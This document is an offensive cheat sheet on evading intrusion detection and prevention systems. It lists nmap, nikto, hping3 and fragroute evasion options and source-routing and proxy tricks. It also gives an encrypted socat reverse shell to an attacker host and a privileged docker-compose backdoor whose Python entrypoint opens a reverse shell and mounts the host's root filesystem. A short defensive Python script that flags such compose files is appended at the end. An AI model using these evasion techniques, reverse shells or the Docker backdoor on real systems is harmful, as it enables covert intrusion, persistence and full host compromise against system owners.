# IDS & IPS Evasion

* Evasion by manipulation of
  * Tool parameters
  * Protocol
  * Payload
  * Route
  * Or DoS

## Enumeration

* [User-Agents](https://developers.whatismybrowser.com/useragents/explore/)

### nmap

* `--script-args http.useragent=""`
* `-sS` half-open (SYN) scan

### nikto

* `-useragent `
* Tuning `-T 1 2 3`
* __NOT__ `-evasion `, it increases detection

## Protocol Manipulation

### Relying on another protocol

* `nc -ulvnp 4711` for listening to incoming UDP traffic
* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP

### Manipulation of the source's or LHOST's network port

* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic from that port

### Session splicing by fragmentation and segmentation

* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu ` for a custom MTU
* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag ` in `fragroute.conf`, then run `fragroute -f fragroute.conf $TARGET_IP`

### Sending invalid packets

* Invalid protocol header flags and checksums via `nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatenation of multiple flags `nmap --scanflags SYNRSTFIN`
* `hping3` including `--ttl`, `--badsum`, header flags `-S`, `-A`, `-P`, `-U`, `-F`, `-R`

## Payload Manipulation

### Obfuscation and Encoding

* Base64
* URL
* Escaped Unicode Characters

### Encrypting Communication Channels

* Use socat with encryption; first create a self-signed certificate and key

  ```sh
  openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
  ```

* Create a `.pem` (Privacy Enhanced Mail) file via

  ```sh
  cat id_rsa.key reverse.crt > reverse.pem
  ```

* Listening on attacker side

  ```sh
  socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
  ```

* On target

  ```sh
  socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
  ```

### Modification of Data

* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
* Adding whitespaces to the commands
* Use aliases

## Route Manipulation

### Relying on Source Routing

* `nmap --ip-options "L 10.10.20.30 10.10.30.40"` routes through these IPs loosely (loose source routing)
* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly (strict source routing)

### Using Proxy Servers

* `nmap -sS --proxies http://$PROXY1:80,socks4://$PROXY2:8080 $TARGET_IP` (the proxy list is passed with `--proxies`; nmap only honours it for NSE scripts and version detection, not for host discovery or the port scan itself)

## Tactical DoS

* Non-malicious, benign traffic against
  * IDS/IPS
  * Logging server

## MISC

* Changing
  * `User-Agent`
  * Request frequency and duration of sleep
  * SSL/TLS certs
  * DNS beacon, storing exfiltrated data in the query

## Backdoors

* Backdooring without getting recognized by the IDS/IPS by reading its rules in the config file

### Docker

* Create a `docker-compose.yaml` file with a reverse shell as the entry point and mount the host's root volume to `/mnt` inside the container

  ```yaml
  ---
  version: "2.1"
  services:
    backdoorservice:
      restart: always
      image:
      entrypoint: >
        python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
        s.connect(("<$ATTACKER_IP>",4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
        pty.spawn("/bin/sh")'
      volumes:
        - /:/mnt
      privileged: true
  ```
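A defender-side check for the Docker backdoor pattern above, added here as an example and not part of the original cheat sheet: it scans a compose file for the three traits the service combines (a shell-spawning entrypoint, the host root mounted into the container, privileged mode) so such a file can be flagged in CI or on a host before it is ever started. The sample compose text, service names and token list are constructed assumptions, and the indentation-based scan assumes two spaces per level, as in the page's example.

```python
import re
from typing import Dict, List

# Constructed sample (not the page's file): one service carrying the three
# backdoor traits, plus a benign service to show it is not flagged.
SAMPLE_COMPOSE = """\
version: "2.1"
services:
  backdoorservice:
    restart: always
    image: python:3
    entrypoint: >
      python -c 'import socket,os,pty; pty.spawn("/bin/sh")'
    volumes:
      - /:/mnt
    privileged: true
  web:
    image: nginx
    volumes:
      - ./html:/usr/share/nginx/html:ro
"""

# Tokens typical of an entrypoint/command that spawns an interactive shell.
SHELL_TOKENS = re.compile(r"\bsocket\b|\bpty\b|\bdup2\b|/dev/tcp|/bin/(?:ba)?sh")


def audit_compose(text: str) -> Dict[str, List[str]]:
    """Return {service: [finding, ...]} for services showing backdoor traits."""
    findings: Dict[str, List[str]] = {}
    service, exec_indent, in_services = None, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        indent = len(raw) - len(raw.lstrip(" "))
        if indent == 0:                       # top-level key: track 'services:'
            in_services, service = line == "services:", None
            continue
        if in_services and indent == 2 and line.endswith(":"):
            service, exec_indent = line[:-1], None   # new service block
            continue
        if service is None:
            continue
        hits = findings.setdefault(service, [])
        if line.startswith(("entrypoint:", "command:")):
            exec_indent = indent              # folded/continued value may follow
        elif exec_indent is not None and indent <= exec_indent:
            exec_indent = None                # continuation of the exec key ended
        if exec_indent is not None and SHELL_TOKENS.search(line):
            msg = "shell-spawning entrypoint/command"
        elif re.match(r"-\s*/:/", line):      # host root bind-mounted
            msg = "host root filesystem mounted"
        elif line == "privileged: true":
            msg = "privileged container"
        else:
            continue
        if msg not in hits:
            hits.append(msg)
    return {svc: hits for svc, hits in findings.items() if hits}
```

A service reporting all three findings matches the pattern on this page exactly; any one of them on its own is still worth a review.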